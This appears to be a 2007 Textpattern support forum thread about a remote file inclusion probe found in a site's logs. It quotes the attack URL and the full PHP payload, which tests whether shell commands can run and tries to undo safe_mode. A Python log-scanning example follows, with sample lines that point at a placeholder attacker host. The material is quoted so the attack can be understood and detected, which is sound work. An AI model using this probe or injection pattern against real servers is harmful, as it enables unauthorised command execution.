Textpattern CMS support forum
#1 2007-10-19 07:59:42
- Moofle
- New Member
- Registered: 2007-10-19
- Posts: 1
Bot doing Security Attacks/Checks
Hi,
I’ve been noticing that someone tried an attack on my txp site.
It came in the logs like this:
/article//textpattern/publish.php?txpcfg[txpath]=http://www.v3.astrolabium.pl/test.txt?
And the test.txt contains this code, any idea of what it’s doing?
<?php
// Probe: can this host run shell commands? "id" prints "uid=..." on Unix,
// "net start" output mentions "Windows" on Windows.
if((eregi("uid",ex("id"))) || (eregi("Windows",ex("net start")))){
    $contrs=0;
}
else{
    // First try failed: reset safe_mode and open_basedir to their startup values and retry.
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((eregi("uid",ex("id"))) || (eregi("Windows",ex("net start")))){
        $contrs=0;
    }
    else{
        $contrs=1;
    }
}
// Print a marker string that the scanning bot looks for in the response.
if($contrs == 0){
    echo("FUCKSAFEMODEOFFBYMIC22");
}else{
    echo("FUCKSAFEMODEONBYMIC22");
}
// Run a command through whichever execution function is available and return its output.
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = shell_exec($cfe);
        }
        elseif(function_exists('system')){
            ob_start();
            system($cfe);
            $res = ob_get_contents();
            ob_end_clean();
        }
        elseif(function_exists('passthru')){
            ob_start();
            passthru($cfe);
            $res = ob_get_contents();
            ob_end_clean();
        }
        elseif(is_resource($f = popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= fread($f,1024); }
            pclose($f);
        }
    }
    return $res;
}
exit;
Re: Bot doing Security Attacks/Checks
I had similar attacks, some from university sites. For those I used the contact forms of the universities and the offending scripts (some similar to the above and others just spam referrers) were removed. Regarding the site above, I’m not sure if I would contact them.
Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Re: Bot doing Security Attacks/Checks
That attack is aimed at an old TXP version. If you’re running a recent 4.0.x version, it can’t do any harm.
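A log check for the request pattern reported in this thread, as an added example that is not part of any forum post or of Textpattern's code: it flags requests in which a query parameter's value is itself a remote URL, including the percent-encoded form of the same probe. The sample log lines, the host attacker.example and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter whose value is itself a URL is what the probe in this thread looks like.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines (documentation IPs, placeholder host), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2007:07:41:02 +0000] "GET /article//textpattern/'
    'publish.php?txpcfg[txpath]=http://attacker.example/test.txt? HTTP/1.1" 404 512',
    '198.51.100.7 - - [19/Oct/2007:07:41:09 +0000] "GET /index.php?txpcfg%5Btxpath'
    '%5D=HTTP%3A%2F%2Fattacker.example%2Ftest.txt%3F HTTP/1.0" 200 1830',
    '203.0.113.5 - - [19/Oct/2007:07:42:30 +0000] "GET /article/12/hello'
    '?commented=1 HTTP/1.1" 200 9120',
]


def remote_include_params(target):
    """Return [(name, value)] for query parameters whose decoded value is a remote URL."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes names and values, so encoded probes are caught too.
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(value.strip())]


def scan(lines):
    """Return [(client_ip, name, value)] for every suspicious request in the log lines."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, value in remote_include_params(match.group(1)):
            findings.append((client_ip, name, value))
    return findings


if __name__ == "__main__":
    # Legitimate parameters that carry URLs (redirect targets, feeds) will also
    # match, so treat hits as leads to review rather than confirmed attacks.
    for client_ip, name, value in scan(SAMPLE_LOG):
        print(f"{client_ip}: parameter {name!r} points at {value!r}")
```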